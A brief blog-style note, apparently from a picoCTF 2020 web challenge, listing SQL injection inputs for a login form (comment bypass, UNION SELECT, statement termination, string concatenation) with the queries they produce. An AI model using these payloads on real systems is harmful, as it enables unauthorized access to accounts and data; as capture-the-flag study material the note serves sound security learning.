SQL Injection
Username: admin' --
Password: 123
Actual Query: SELECT * FROM users WHERE username='admin' -- AND password='123'
Username: admin' union select * from users where '1
Password: 123
Actual Query: SELECT * FROM users WHERE username='admin' union select * from users where '1' AND password='123'
Username: admin';
Password: 123
Actual Query: SELECT * FROM users WHERE username='admin';' AND password='123'
Username: ad'||'min';
Password: 123
Actual Query: SELECT * FROM users WHERE username='ad'||'min';' AND password='123'
https://github.com/onealmond/hacking-lab/blob/master/picoctf-2020/web-gauntlet/writeup.md
沒有留言:
張貼留言